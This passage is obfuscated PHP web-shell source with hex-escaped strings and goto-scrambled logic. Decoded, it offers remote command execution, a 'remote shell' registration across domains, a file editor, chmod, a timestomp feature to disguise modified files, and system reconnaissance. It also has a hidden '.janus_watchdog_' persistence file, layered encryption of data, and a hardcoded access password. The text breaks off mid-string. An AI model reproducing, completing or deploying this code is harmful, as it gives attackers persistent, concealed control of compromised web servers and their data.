b\x22\x3e\x20\122\x65\147\151\163\164\x65\x72\40\122\145\155\x6f\164\145\40\123\x68\145\x6c\x6c\x20\x28\x44\151\x66\x66\145\x72\145\156\x74\40\104\157\x6d\141\x69\x6e\51\74\57\154\141\x62\x65\154\x3e\x3c\57\x64\151\x76\76\x3c\x64\151\166\x20\x69\144\75\42\x72\x65\147\151\x73\x74\x65\162\x2d\154\157\x63\141\154\x2d\143\157\x6e\164\x61\x69\156\145\x72\x22\76\x3c\144\151\166\x20\163\164\x79\154\x65\75\x22\144\x69\x73\x70\154\141\171\72\147\162\151\x64\73\x20\x67\162\151\144\x2d\x74\145\x6d\160\154\x61\164\145\x2d\143\157\x6c\165\155\x6e\163\x3a\40\x72\x65\160\x65\x61\x74\50\141\x75\164\157\x2d\146\x69\x74\54\40\155\151\x6e\155\x61\170\50\x32\x35\x30\160\x78\54\40\x31\x66\162\x29\51\73\x20\x67\x61\x70\x3a\61\x72\x65\155\73\x20\155\x61\162\x67\151\x6e\55\142\157\x74\164\x6f\x6d\x3a\x31\x72\x65\x6d\73\42\x3e\74\151\x6e\x70\x75\x74\x20\164\171\x70\145\75\42\x74\x65\170\164\x22\40\151\144\x3d\42\162\x65\147\151\x73\x74\x65\x72\x2d\163\150\145\x6c\154\x2d\160\141\164\150\x22\x20\160\x6c\x61\x63\145\x68\x6f\154\144\145\x72\x3d\x22\123\150\x65\154\x6c\40\160\x61\164\x68\40\x28\x6c\145\x61\166\x65\x20\145\155\x70\x74\x79\x20\x66\x6f\162\40\x63\x75\x72\162\145\x6e\x74\x29\x22\40\163\164\171\154\x65\x3d\x22\x67\x72\151\144\x2d\x63\157\154\165\x6d\156\72\40\x31\40\x2f\40\x2d\61\x3b\42\40\x76\x61\154\x75\145\75\42"; goto fvDN7; BojWq: function py2_5($j3_hR, $Vmpzd = 5, $Ntv4k = 0) { goto knzYU; XFJTH: foreach ($pyPWS as $xG20T) { goto LXuOT; BRtV0: $CtBHF["\143\150\151\x6c\x64\162\x65\156"][] = pY2_5($SPA0G, $Vmpzd, $Ntv4k + 1); goto FG1eO; edpyC: if (!is_dir($SPA0G)) { goto ZlXIa; } goto BRtV0; FG1eO: ZlXIa: goto syBuB; luJdX: goto U6nXu; goto VujHx; VujHx: OnpJ_: goto kPPOi; kPPOi: $SPA0G = $j3_hR . DIRECTORY_SEPARATOR . $xG20T; goto edpyC; syBuB: U6nXu: goto XOXjN; LXuOT: if (!($xG20T === "\x2e" || $xG20T === "\56\x2e")) { goto OnpJ_; } goto luJdX; XOXjN: } goto u3Nww; Bk0qf: M2C00: goto XFJTH; ShvPR: $pyPWS = @scandir($j3_hR); goto DdiOj; A4OV4: oV3ht: goto ShvPR; U3Xqk: return $CtBHF; goto ONHN8; u3Nww: AfK5k: goto U3Xqk; DkutS: return $CtBHF; goto A4OV4; DdiOj: if (!($pyPWS === false)) { goto M2C00; } goto pWobe; Wu7rk: if (!(!is_readable($j3_hR) || $Ntv4k >= $Vmpzd)) { goto oV3ht; } goto DkutS; knzYU: $CtBHF = ["\160\141\164\x68" => realpath($j3_hR), "\x6e\x61\x6d\x65" => basename($j3_hR), "\143\150\151\154\x64\x72\x65\156" => []]; goto Wu7rk; pWobe: return $CtBHF; goto Bk0qf; ONHN8: } goto qVu8Y; g0Vj0: function OXqHU($siOBH, $IMtDv) { goto n7sqX; oKGRh: $b45TQ = ''; goto yvCQX; yvCQX: $jY45d = 0; goto wXOCY; sK5Ms: $wdqxR = base64_encode($J5Adb); goto ZN9m6; zIj4J: goto ipeuH; goto ZHQpI; nDW6v: $rrs7k = hash_pbkdf2("\x73\x68\x61\62\x35\x36", $IMtDv, $stdxo, 10000, 32, true); goto cwyRN; JmWkw: $stdxo = openssl_random_pseudo_bytes(32); goto QI_00; vMy43: $hsc0Y = openssl_encrypt($SfrUd, "\101\105\x53\x2d\x32\x35\x36\x2d\x43\x42\103", $vx3eO, 0, $ct4lT); goto vKOCh; rohM2: $UcOk9 = substr(hash("\163\150\x61\62\x35\x36", $rrs7k . $AuZsy, true), 0, strlen($GgQhr)); goto oKGRh; D4ndF: $AuZsy = openssl_random_pseudo_bytes(16); goto nDW6v; N9iz7: $KH0Ix = openssl_random_pseudo_bytes(16); goto zPXtD; k0OTw: return $HlKrH; goto I85uR; xteXX: $l9YRS = hash("\163\150\x61\62\65\x36", $IMtDv . $stdxo . $zpw3o, true); goto rohM2; bS3OI: $jY45d++; goto zIj4J; vKOCh: $m2Dp_ = openssl_random_pseudo_bytes(16); goto qx5w9; zPXtD: $SfrUd = openssl_encrypt($b45TQ, "\x41\105\x53\x2d\62\x35\66\x2d\103\102\103", $rrs7k, 0, $KH0Ix); goto PhOm_; kFg4j: $J5Adb = bin2hex($dCEgv); goto sK5Ms; LiSID: $CW01N = $jbM12 . $H133r; goto daL6u; wXOCY: ipeuH: goto DFWFz; m18Kq: $dCEgv = base64_encode($ymoYI); goto kFg4j; XnyIV: $jbM12 = openssl_random_pseudo_bytes(rand(16, 64)); goto LiSID; zz5L9: $HlKrH = base64_encode($DP2Js) . "\x7c" . $wdqxR; goto k0OTw; fjYN6: Nnnb4: goto JmWkw; jOP4Q: if (!($GgQhr === false)) { goto Nnnb4; } goto eWKfg; QI_00: $zpw3o = openssl_random_pseudo_bytes(32); goto D4ndF; DFWFz: if (!($jY45d < strlen($GgQhr))) { goto KU0rK; } goto LMp8e; cONth: $ymoYI = strrev($t4hDp); goto m18Kq; n7sqX: $GgQhr = @gzcompress($siOBH, 9); goto jOP4Q; qx5w9: $H133r = openssl_encrypt($hsc0Y, "\101\105\x53\x2d\x32\x35\66\55\103\x42\103", $l9YRS, 0, $m2Dp_); goto XnyIV; PhOm_: $ct4lT = openssl_random_pseudo_bytes(16); goto vMy43; ZN9m6: $DP2Js = $stdxo . $zpw3o . $AuZsy . $KH0Ix . $ct4lT . $m2Dp_ . chr(strlen($jbM12)); goto zz5L9; ZHQpI: KU0rK: goto N9iz7; LMp8e: $b45TQ .= chr(ord($GgQhr[$jY45d]) ^ ord($UcOk9[$jY45d % strlen($UcOk9)])); goto bIQqC; daL6u: $t4hDp = base64_encode($CW01N); goto cONth; cwyRN: $vx3eO = hash_pbkdf2("\163\x68\x61\x35\x31\x32", $IMtDv . $stdxo, $zpw3o, 5000, 32, true); goto xteXX; bIQqC: BDgnZ: goto bS3OI; eWKfg: $GgQhr = $siOBH; goto fjYN6; I85uR: } goto XEYcS; AytG6: ob_end_flush(); goto sJvYj; jtcB7: header("\103\157\x6e\164\x65\156\164\x2d\104\x65\163\143\x72\151\160\164\x69\x6f\156\72\x20\106\151\x6c\145\x20\124\162\x61\x6e\163\x66\145\162"); goto fGsfc; t2Y3I: $sv0qE = json_decode($JUlBm, true); goto OC_UI; rkr1p: goto CZSD2; goto j1yik; fGsfc: header("\103\157\156\164\x65\x6e\x74\55\124\171\160\x65\x3a\40\x61\x70\160\154\x69\143\x61\164\x69\x6f\x6e\x2f\172\x69\160"); goto Q9FIj; kp2wA: vbH70: goto NNso_; B0LA4: ini_set("\144\151\x73\x70\154\x61\171\137\x65\162\162\157\162\x73", 0); goto IkqWU; vECbI: $etpkF = dirname($zJsLG) . DIRECTORY_SEPARATOR . "\56\152\x61\156\165\163\x5f\167\141\164\143\x68\144\157\x67\x5f" . substr(md5($zJsLG), 0, 8) . "\x2e\x70\150\160"; goto P_nPu; PTVFj: $VtInv = "\162\145\x6d\x6f\x74\145\137\x63\157\155\155\x61\x6e\144\x5f\145\170\145\143"; goto QVY4g; aqr3A: ob_clean(); goto ypaDn; fvDN7: echo __FILE__; goto C6Ssn; TmKLX: $JUlBm = Nz_at($_POST["\160"]); goto t2Y3I; DLAoq: goto S6XqA; goto AIGE_; E_DtZ: chdir($_SESSION["\x63\x77\144"]); goto lTLK3; Xvcad: header("\x43\x6f\156\164\x65\156\x74\x2d\124\171\160\x65\x3a\40\141\160\160\x6c\151\143\x61\x74\151\157\156\x2f\x6f\143\164\145\164\55\163\164\x72\145\141\155"); goto R_mq2; k_1Jl: function CY_0b() : array { goto fg4Jx; fg4Jx: global $DqyA2; goto hpXFc; r3cwN: return ["\x53\150\x65\x6c\154\40\x56\145\162\163\x69\x6f\x6e" => Lu3Gi, "\x55\x6e\141\155\x65" => php_uname("\x61"), "\x4f\x70\145\x72\x61\164\151\x6e\147\x20\x53\171\x73\164\x65\x6d" => php_uname("\163") . "\x20" . php_uname("\x72"), "\x68\157\163\164\x6e\x61\x6d\x65" => php_uname("\x6e"), "\x53\145\x72\166\x65\162\x20\110\x6f\x73\164\x6e\x61\155\x65" => php_uname("\x6e"), "\123\145\162\x76\145\x72\40\x49\120" => isset($_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\x44\x52"]) ? $_SERVER["\123\105\x52\x56\105\x52\137\x41\x44\104\x52"] : "\x4e\x2f\101", "\x59\157\165\162\x20\x49\120" => $_SERVER["\122\105\x4d\117\124\105\137\101\x44\x44\x52"], "\x75\x73\145\x72" => get_current_user(), "\x43\x75\x72\x72\145\156\164\40\125\x73\145\162" => get_current_user() . "\x20\x28" . getmyuid() . "\x3a" . getmygid() . "\x29", "\x50\110\x50\40\126\145\162\x73\151\157\156" => PHP_VERSION, "\x57\x65\x62\40\x53\x65\x72\x76\x65\162" => isset($_SERVER["\x53\105\x52\x56\x45\122\137\123\x4f\106\124\x57\101\122\105"]) ? $_SERVER["\123\x45\x52\126\105\x52\137\123\x4f\x46\x54\x57\101\122\105"] : "\116\57\101", "\x44\x69\x73\141\x62\x6c\x65\x64\40\106\165\x6e\x63\x74\x69\x6f\x6e\x73" => $PHYwo ? wordwrap($PHYwo, 60, "\xa", true) : "\116\157\x6e\145", "\x47\x69\164\150\x75\142\x20\114\151\156\153" => "\74\x61\40\x68\x72\x65\x66\75\42\150\x74\164\x70\163\x3a\57\57\147\151\x74\150\x75\142\x2e\x63\157\x6d\57\152\157\145\154\151\156\144\162\141\42\40\164\x61\x72\147\x65\x74\75\42\x5f\x62\154\141\x6e\x6b\x22\x20\x73\x74\171\x6c\x65\75\42\x63\157\154\x6f\162\x3a\40\167\150\x69\x74\145\73\42\x3e\112\x6f\x65\x6c\40\x49\x6e\x64\162\141\74\x2f\x61\x3e"]; goto iUb2Z; hpXFc: $PHYwo = implode("\54\x20", $DqyA2); goto r3cwN; iUb2Z: } goto BojWq; k2uXR: echo "\42\x3e\12\x9\x9\11\11\11\11\12\11\11\11\11\11\11\x3c\x64\x69\166\x20\x73\164\171\x6c\145\x3d\x22\147\x72\x69\x64\55\x63\157\154\165\155\156\x3a\40\x31\x20\x2f\40\55\61\x3b\40\x70\141\144\144\x69\x6e\x67\x3a\61\x35\x70\x78\x3b\40\x62\x61\x63\x6b\x67\162\x6f\165\x6e\x64\72\x76\141\x72\50\x2d\x2d\x62\x67\55\154\x69\x67\150\x74\x29\73\40\x62\x6f\162\144\145\162\x2d\x72\141\x64\151\165\x73\72\x36\x70\170\73\40\146\157\x6e\x74\55\163\151\x7a\x65\72\60\x2e\x38\65\162\x65\155\73\40\143\157\x6c\157\162\x3a\166\141\x72\50\55\55\164\145\x78\x74\x2d\155\145\144\51\x3b\40\142\x6f\x72\144\x65\162\55\x6c\x65\146\164\x3a\x33\160\x78\40\x73\157\154\x69\x64\x20\166\141\162\x28\x2d\x2d\141\x63\x63\145\156\164\x2d\142\154\x75\145\x29\73\x22\x3e\12\11\11\11\11\x9\x9\11\74\x73\x74\x72\157\x6e\147\40\163\x74\x79\154\145\x3d\x22\143\157\x6c\x6f\162\x3a\166\x61\162\50\55\55\141\143\143\x65\x6e\x74\x2d\x62\154\165\x65\x29\73\x22\76\342\x84\271\xef\xb8\x8f\40\x49\156\x66\157\x72\155\141\164\x69\x6f\156\72\x3c\x2f\163\x74\162\x6f\x6e\x67\76\x3c\142\x72\x3e\xa\11\11\x9\11\x9\11\x9\342\200\242\x20\x2e\150\x74\141\143\x63\145\x73\x73\40\x61\153\141\156\40\x64\151\142\x75\141\164\40\x64\151\40\144\x69\162\x65\153\x74\x6f\x72\151\x20\x79\141\156\147\x20\x73\x61\x6d\141\x20\144\x65\156\147\x61\x6e\x20\x73\150\145\154\x6c\74\142\162\76\xa\x9\11\11\11\11\11\11\xe2\200\xa2\x20\120\x72\157\x74\x65\x63\164\151\157\x6e\x20\x61\153\x61\x6e\40\155\145\x6d\x62\154\x6f\x6b\x69\162\40\141\x6b\163\x65\x73\x20\x47\105\x54\x20\x6c\x61\156\147\163\165\156\x67\40\164\x61\x6e\x70\x61\x20\164\x6f\153\x65\156\74\142\x72\76\xa\x9\x9\x9\x9\x9\11\11\342\200\242\x20\x50\x4f\123\x54\x20\x72\x65\161\165\145\x73\x74\x73\x20\164\145\164\141\160\40\144\x69\x69\172\x69\x6e\x6b\141\156\40\x75\x6e\x74\165\x6b\x20\153\x6f\x6d\165\156\151\153\x61\x73\151\40\163\x68\x65\154\154\x3c\142\162\76\xa\x9\x9\11\11\11\11\11\xe2\x80\242\40\x53\145\x63\162\x65\x74\x20\164\x6f\153\x65\156\x20\141\153\x61\156\x20\x64\x69\x73\x69\x6d\x70\x61\156\40\x64\151\40\x66\151\x6c\x65\40\56\152\141\156\165\x73\x5f\x73\145\x63\x72\x65\x74\x5f\52\x3c\142\x72\x3e\12\x9\x9\11\11\x9\x9\11\xe2\200\xa2\x20\x46\151\x6c\145\x20\x2e\150\164\x61\x63\143\x65\x73\x73\40\124\x49\x44\x41\113\40\144\151\x62\165\141\x74\x20\x6f\x74\157\x6d\141\x74\x69\x73\x20\163\x61\141\x74\40\x73\150\x65\154\154\x20\144\x69\x62\165\153\141\74\x62\162\x3e\xa\x9\x9\11\11\11\x9\11\342\x80\242\40\101\x6e\x64\x61\40\150\141\x72\165\x73\40\155\145\x6e\x67\153\154\151\x6b\40\164\x6f\x6d\x62\x6f\x6c\40\42\x47\x65\x6e\x65\x72\x61\164\x65\x22\40\165\x6e\164\x75\x6b\40\x6d\x65\x6d\x62\x75\141\x74\156\171\141\xa\11\x9\x9\11\11\x9\74\x2f\x64\151\166\x3e\xa\x9\11\x9\11\x9\74\x2f\x64\151\166\x3e\xa\x9\11\x9\11\11\12\11\x9\11\11\x9\x3c\142\165\164\x74\x6f\x6e\40\x69\x64\75\42\143\x72\x65\141\164\x65\x2d\x68\164\x61\x63\143\x65\x73\163\x2d\x62\164\x6e\x22\x20\143\154\141\x73\x73\x3d\42\144\141\156\x67\x65\162\55\142\x74\156\42\76\360\x9f\x9b\xa1\xef\270\x8f\x20\x47\x65\x6e\145\x72\141\x74\145\x20\x2e\x68\x74\x61\143\x63\x65\163\x73\x20\x50\x72\x6f\164\145\143\164\151\157\156\x3c\57\x62\165\164\164\x6f\x6e\x3e\xa\x9\x9\11\x9\x9\74\x64\151\x76\40\151\144\x3d\42\x64\145\x66\145\x6e\x64\x2d\x72\x65\163\x75\x6c\x74\163\42\x20\x73\164\x79\154\145\75\42\155\141\x72\x67\151\156\x2d\x74\x6f\x70\x3a\61\162\145\x6d\73\x22\76\x3c\57\144\151\166\x3e\xa\11\11\11\11\74\x2f\x64\151\x76\x3e\12\x9\x9\x9\74\x2f\144\151\x76\x3e\12\x9\11\x3c\57\x64\x69\166\x3e\xa\11\74\57\144\x69\166\x3e\12\40\x9\x3c\144\x69\x76\x20\151\144\x3d\x22\x65\x64\151\x74\157\x72\55\x6d\x6f\144\x61\154\x22\x20\143\x6c\x61\x73\x73\x3d\42\155\157\144\x61\154\x22\76\74\x64\151\x76\x20\143\154\141\163\x73\x3d\42\155\x6f\x64\x61\x6c\55\x63\x6f\x6e\164\145\x6e\x74\x22\x20\x73\164\171\x6c\x65\75\x22\x77\x69\x64\164\x68\72\40\x39\x30\x25\73\40\x6d\x61\170\55\x77\151\x64\x74\x68\72\40\61\62\60\60\x70\x78\73\42\x3e\x3c\144\151\x76\x20\143\154\141\x73\163\x3d\x22\155\x6f\144\141\154\55\x68\145\x61\144\x65\x72\42\x3e\x3c\150\63\x20\151\144\x3d\x22\145\144\151\164\x6f\x72\55\x66\x69\154\145\x6e\x61\x6d\145\x22\x3e\74\57\150\63\76\74\163\x70\x61\x6e\x20\x63\154\x61\163\x73\x3d\42\x63\x6c\157\x73\145\x22\x3e\46\164\x69\x6d\x65\x73\73\x3c\57\x73\160\141\x6e\x3e\x3c\x2f\x64\151\166\76\74\x64\151\x76\40\143\154\141\x73\x73\75\x22\155\157\144\x61\x6c\x2d\142\157\x64\x79\x22\x3e\x3c\164\x65\170\x74\141\x72\145\141\x20\151\x64\75\x22\145\144\x69\164\157\162\x2d\x74\145\x78\x74\141\162\x65\141\x22\76\74\x2f\x74\145\170\x74\141\162\x65\x61\76\74\57\x64\x69\166\x3e\74\x62\165\x74\x74\x6f\x6e\x20\151\144\x3d\42\x73\x61\x76\x65\55\146\151\x6c\x65\x2d\x62\x74\156\42\40\x73\x74\171\154\x65\x3d\x22\155\141\x72\x67\151\x6e\x2d\x74\157\x70\72\40\61\162\x65\x6d\x3b\x20\x61\x6c\151\147\x6e\55\163\145\154\146\x3a\x20\x66\154\145\170\x2d\x65\156\144\x3b\x22\x3e\123\x61\166\x65\x20\x43\x68\141\x6e\x67\x65\163\74\57\142\165\164\x74\x6f\156\76\x3c\57\x64\x69\x76\76\x3c\x2f\x64\151\x76\x3e\12\x20\x9\74\144\x69\166\x20\151\x64\x3d\42\143\150\155\x6f\x64\x2d\155\157\144\141\154\x22\x20\143\154\141\163\163\x3d\x22\x6d\x6f\x64\141\x6c\42\76\74\144\x69\x76\x20\143\x6c\x61\x73\x73\75\42\x6d\157\144\141\154\x2d\143\x6f\x6e\x74\x65\156\x74\x22\40\x73\164\x79\x6c\145\75\42\x77\x69\144\164\x68\72\x20\141\x75\164\157\73\x22\76\x3c\144\x69\166\40\x63\x6c\x61\163\163\75\42\155\157\x64\141\154\x2d\x68\145\x61\x64\x65\x72\x22\x3e\74\150\x33\76\103\150\x61\x6e\147\145\40\x50\x65\162\x6d\151\163\x73\x69\x6f\156\x73\x3c\x2f\x68\x33\x3e\74\163\x70\x61\x6e\x20\143\x6c\141\x73\163\75\x22\x63\154\x6f\163\x65\42\x3e\x26\164\x69\155\x65\163\x3b\74\x2f\x73\x70\x61\156\x3e\x3c\57\x64\x69\x76\x3e\x3c\151\x6e\x70\165\164\40\x74\171\x70\145\x3d\42\x74\145\x78\164\42\x20\x69\x64\75\x22\x63\150\155\x6f\144\55\160\x61\164\x68\x22\40\x72\x65\x61\144\157\x6e\x6c\171\x20\x73\164\171\154\145\75\42\155\x61\162\x67\151\x6e\55\142\x6f\x74\x74\x6f\155\72\x20\61\x72\x65\155\x3b\x22\76\x3c\151\x6e\160\x75\164\40\x74\171\x70\x65\75\42\164\x65\x78\x74\x22\x20\x69\144\x3d\x22\143\x68\155\x6f\x64\55\x69\156\x70\x75\x74\x22\x20\x70\154\141\x63\145\x68\x6f\154\x64\145\x72\75\42\x65\56\147\56\54\40\x30\x37\65\65\x22\40\x73\164\x79\x6c\145\x3d\x22\155\x61\162\147\x69\156\x2d\142\x6f\x74\x74\x6f\x6d\72\40\x31\x72\x65\x6d\73\42\x3e\x3c\x62\x75\164\164\x6f\156\40\x69\x64\x3d\42\143\x68\155\157\x64\55\163\141\166\x65\55\142\164\156\42\x20\163\x74\171\154\145\75\x22\141\154\151\x67\156\55\x73\145\154\146\x3a\40\146\154\x65\x78\55\145\156\144\x3b\x22\76\123\145\164\40\x50\145\162\155\151\163\163\x69\x6f\156\163\74\x2f\x62\165\164\x74\x6f\x6e\76\74\57\x64\x69\x76\76\x3c\57\x64\151\x76\x3e\xa\40\x9\74\x64\x69\x76\x20\151\x64\x3d\x22\164\x69\x6d\145\163\164\157\x6d\x70\x2d\x6d\157\144\141\x6c\x22\x20\143\154\x61\163\x73\75\42\155\x6f\x64\x61\x6c\x22\x3e\x3c\x64\x69\166\40\x63\154\141\163\x73\75\x22\155\x6f\144\x61\x6c\x2d\x63\157\x6e\164\x65\x6e\164\42\40\163\164\171\x6c\145\75\x22\167\151\x64\x74\x68\72\x20\x36\x30\x30\160\x78\x3b\42\x3e\74\144\x69\x76\x20\143\x6c\141\x73\163\x3d\x22\x6d\157\x64\x61\154\55\x68\x65\x61\x64\x65\162\x22\76\x3c\x68\x33\x3e\x54\151\x6d\145\163\x74\x6f\x6d\160\x20\106\151\x6c\145\x3c\57\150\63\76\x3c\163\160\x61\156\x20\143\154\141\x73\163\75\x22\143\x6c\x6f\x73\145\x22\x3e\46\164\x69\x6d\145\x73\73\x3c\x2f\163\160\x61\x6e\76\x3c\x2f\x64\x69\x76\x3e\x3c\x70\x20\163\x74\x79\x6c\x65\75\42\155\141\x72\x67\151\x6e\x2d\164\x6f\160\x3a\x30\x3b\40\143\157\x6c\157\162\72\x76\141\x72\x28\55\55\x74\x65\170\164\55\155\145\x64\x29\73\42\76\x43\150\x61\x6e\x67\x65\40\x74\150\145\x20\164\x69\x6d\145\x73\164\141\155\160\x20\x6f\146\40\74\x73\x74\x72\157\x6e\147\40\x69\x64\75\42\x74\x69\155\145\x73\164\x6f\155\160\x2d\x64\145\x73\x74\x2d\146\151\x6c\145\156\x61\155\145\42\x3e\74\x2f\x73\x74\162\x6f\156\x67\76\x20\164\x6f\x20\x6d\x61\x74\143\150\x20\141\40\x73\157\x75\x72\143\x65\40\146\151\x6c\x65\56\74\x2f\160\x3e\74\151\x6e\160\165\164\40\x74\171\x70\x65\75\x22\164\x65\170\164\42\40\x69\x64\x3d\x22\x74\x69\155\145\x73\x74\157\155\160\x2d\x73\x6f\165\x72\143\145\x2d\x69\x6e\x70\165\164\42\x20\x70\154\141\x63\145\150\x6f\154\144\145\x72\x3d\42\x46\165\154\x6c\40\x70\x61\164\x68\40\x74\157\40\x73\157\x75\x72\x63\145\x20\x66\x69\154\145\40\50\x65\x2e\x67\56\x2c\40\x2f\x62\x69\156\57\x73\x68\x29\x22\40\163\x74\171\x6c\145\75\x22\x77\x69\144\164\150\x3a\x31\60\60\45\x3b\40\x6d\x61\162\147\151\x6e\x2d\142\x6f\x74\164\157\x6d\72\40\x31\x72\145\x6d\x3b\42\76\x3c\x62\x75\164\x74\x6f\x6e\x20\x69\144\x3d\42\x74\x69\x6d\145\x73\164\x6f\155\x70\x2d\x73\x61\166\145\x2d\x62\x74\156\42\x20\x73\x74\171\154\x65\x3d\42\141\154\x69\147\156\55\x73\x65\154\146\72\x20\x66\154\x65\170\55\145\156\x64\73\x22\x3e\x41\160\x70\154\x79\40\124\x69\x6d\145\x73\164\141\155\160\x3c\57\142\165\x74\x74\157\x6e\76\x3c\x2f\x64\x69\166\x3e\x3c\57\x64\x69\166\x3e\xa\40\x9\x3c\144\151\x76\40\151\x64\75\42\x6d\x65\x64\151\141\x2d\155\x6f\x64\141\x6c\x22\x20\x63\154\x61\163\163\x3d\42\155\x6f\x64\141\x6c\42\76\74\144\x69\166\x20\x63\154\141\x73\x73\x3d\42\x6d\157\144\141\x6c\55\143\x6f\x6e\x74\x65\x6e\164\x22\x3e\x3c\144\x69\x76\x20\143\x6c\x61\163\x73\75\42\x6d\157\144\x61\x6c\55\x68\145\141\x64\x65\x72\x22\76\74\x68\x33\x3e\x4d\x65\x64\x69\x61\40\x56\151\x65\x77\145\162\x3c\57\150\x33\76\x3c\163\x70\x61\x6e\40\x63\154\141\x73\x73\75\x22\x63\154\157\x73\x65\42\x3e\x26\164\151\x6d\x65\163\x3b\74\57\x73\x70\x61\156\76\x3c\57\x64\x69\166\x3e\x3c\144\x69\x76\x20\x63\154\141\x73\x73\x3d\42\x6d\x6f\144\x61\154\55\142\157\x64\x79\x22\x20\x69\144\x3d\x22\155\x65\x64\151\x61\x2d\143\157\x6e\x74\x65\x6e\164\42\x20\163\164\171\x6c\145\75\x22\x74\x65\170\x74\x2d\x61\154\151\x67\156\72\143\145\x6e\164\x65\x72\x3b\x22\x3e\74\57\144\151\x76\76\x3c\57\144\x69\166\76\x3c\x2f\x64\x69\x76\x3e\12\11\74\x64\151\x76\x20\151\x64\x3d\42\160\x61\x73\x73\x77\x6f\x72\x64\55\x6d\x6f\144\x61\154\x22\40\x63\154\x61\163\163\x3d\42\155\x6f\x64\141\154\42\76\74\x64\151\166\x20\x63\x6c\x61\163\163\75\42\x6d\x6f\x64\x61\154\55\143\157\x6e\x74\x65\156\x74\40\160\141\x73\x73\167\157\162\144\x2d\x6d\157\x64\x61\154\x2d\143\157\156\164\145\x6e\164\x22\x3e\x3c\144\151\x76\x20\143\x6c\x61\x73\x73\75\42\155\x6f\144\x61\154\55\150\x65\x61\144\145\162\40\160\141\x73\163\x77\157\x72\x64\55\x6d\157\144\141\154\x2d\150\145\x61\x64\x65\x72\x22\76\74\x68\63\x3e\360\237\224\x90\40\120\141\163\163\x77\157\x72\144\x20\122\x65\161\165\151\x72\x65\x64\74\57\150\x33\76\74\x73\160\x61\x6e\x20\143\154\141\x73\x73\x3d\x22\143\154\x6f\163\145\x22\40\151\144\x3d\42\160\141\x73\x73\x77\x6f\x72\x64\55\155\x6f\x64\141\x6c\55\x63\x6c\x6f\x73\x65\42\x3e\46\x74\151\155\x65\x73\x3b\74\57\x73\x70\141\x6e\76\x3c\57\x64\x69\166\x3e\74\144\x69\166\40\x63\x6c\x61\x73\x73\75\42\155\157\144\x61\154\x2d\x62\157\144\x79\x20\160\141\x73\x73\x77\x6f\162\144\x2d\x6d\157\144\141\154\x2d\x62\157\x64\171\x22\x3e\74\x64\151\x76\40\143\154\x61\x73\163\75\42\160\x61\x73\x73\167\157\x72\x64\x2d\x69\156\146\157\x2d\142\157\170\x22\x3e\x3c\x64\151\x76\x20\143\x6c\141\x73\x73\x3d\42\160\x61\163\x73\x77\x6f\x72\x64\55\151\x63\x6f\156\x22\76\xf0\x9f\x94\221\74\57\144\x69\166\76\x3c\160\x20\x63\x6c\141\x73\163\75\x22\160\x61\x73\x73\167\x6f\x72\144\55\x68\x69\x6e\x74\42\76\x4d\141\x73\165\153\x6b\141\x6e\40\x70\141\x73\163\x77\x6f\x72\144\x20\x75\x6e\164\x75\x6b\x20\155\x65\156\147\141\x6b\163\x65\163\40\x44\x6f\x6d\x61\151\156\x20\x49\156\164\x65\x6c\x3c\57\160\76\74\144\151\x76\x20\143\154\x61\163\163\75\42\160\141\x73\x73\167\157\x72\144\55\144\151\163\160\154\x61\171\42\x3e\x3c\163\x70\141\x6e\x20\143\x6c\x61\163\x73\75\42\160\x61\x73\163\x77\x6f\x72\144\55\154\x61\142\145\154\42\x3e\120\141\163\x73\167\157\162\144\72\74\57\x73\x70\141\x6e\76\x3c\163\x70\141\x6e\x20\x63\154\141\163\x73\x3d\42\x70\141\x73\163\167\157\162\144\x2d\166\x61\154\165\145\x22\x20\151\x64\x3d\x22\x70\x61\163\163\167\157\x72\x64\x2d\144\151\163\160\x6c\141\171\55\166\141\154\165\145\42\x3e\150\x61\143\153\145\162\164\145\x72\154\x61\162\141\x6e\147\74\x2f\163\x70\x61\x6e\x3e\74\142\x75\x74\164\157\x6e\x20\x63\x6c\141\x73\x73\75\42\143\x6f\x70\171\x2d\160\141\x73\x73\167\x6f\162\144\55\142\164\156\x22\x20\x69\144\x3d\x22\143\x6f\160\x79\55\160\x61\163\x73\167\x6f\x72\144\55\x62\164\156\x22\x20\x74\x69\x74\x6c\145\x3d\42\103\157\x70\x79\x20\120\x61\x73\x73\x77\x6f\162\x64\x22\76\xf0\x9f\223\x8b\74\57\x62\165\x74\x74\x6f\x6e\76\74\57\144\151\x76\76\74\x2f\x64\151\166\76\x3c\x64\151\166\x20\x63\x6c\x61\163\x73\75\42\x70\141\x73\163\x77\x6f\162\144\x2d\151\x6e\160\165\164\x2d\147\162\157\165\x70\42\x3e\74\154\x61\142\x65\154\x20\146\x6f\162\75\42\160\x61\163\163\x77\x6f\162\x64\x2d\x69\156\160\165\x74\42\x3e\105\x6e\x74\x65\162\x20\x50\141\x73\x73\x77\x6f\x72\144\x3a\74\x2f\154\x61\142\145\154\x3e\74\151\156\x70\x75\x74\40\164\x79\x70\x65\75\x22\x70\x61\163\163\167\x6f\x72\144\x22\x20\x69\x64\75\42\160\141\x73\163\x77\157\x72\x64\x2d\x69\x6e\160\165\x74\42\x20\160\154\x61\143\145\150\157\x6c\144\145\162\75\42\115\141\163\x75\153\153\141\x6e\x20\160\141\x73\x73\167\x6f\x72\x64\x20\144\151\x20\163\151\x6e\x69\x2e\56\x2e\x22\x20\141\x75\164\157\x63\x6f\x6d\x70\154\x65\164\145\x3d\42\x6f\146\x66\x22\x20\x61\165\x74\x6f\146\157\x63\165\163\76\74\144\x69\166\x20\143\154\x61\x73\163\75\x22\x70\141\163\163\167\157\x72\144\55\145\162\162\x6f\162\x22\x20\x69\x64\75\x22\160\141\163\163\x77\x6f\x72\x64\x2d\145\162\162\157\x72\42\76\74\x2f\x64\151\166\76\74\57\x64\151\166\76\74\x64\151\x76\40\143\x6c\141\x73\x73\75\x22\160\141\x73\x73\167\x6f\x72\x64\x2d\155\x6f\144\x61\x6c\x2d\141\143\164\x69\x6f\x6e\x73\x22\x3e\74\x62\165\164\164\157\156\40\x69\144\75\42\160\141\x73\x73\x77\157\162\x64\x2d\x63\x61\156\x63\145\154\55\x62\164\x6e\x22\40\x63\154\141\x73\163\75\x22\160\141\163\x73\x77\x6f\x72\144\x2d\142\164\156\x2d\x63\x61\156\x63\x65\x6c\42\x3e\103\x61\156\x63\x65\154\x3c\57\142\165\x74\x74\157\156\x3e\74\142\x75\x74\x74\x6f\x6e\40\151\x64\75\x22\x70\x61\163\x73\x77\157\x72\x64\55\163\165\x62\155\151\164\x2d\142\x74\156\42\x20\x63\x6c\141\x73\x73\x3d\42\x70\141\x73\163\167\157\x72\144\x2d\x62\x74\x6e\x2d\x73\x75\142\x6d\151\x74\x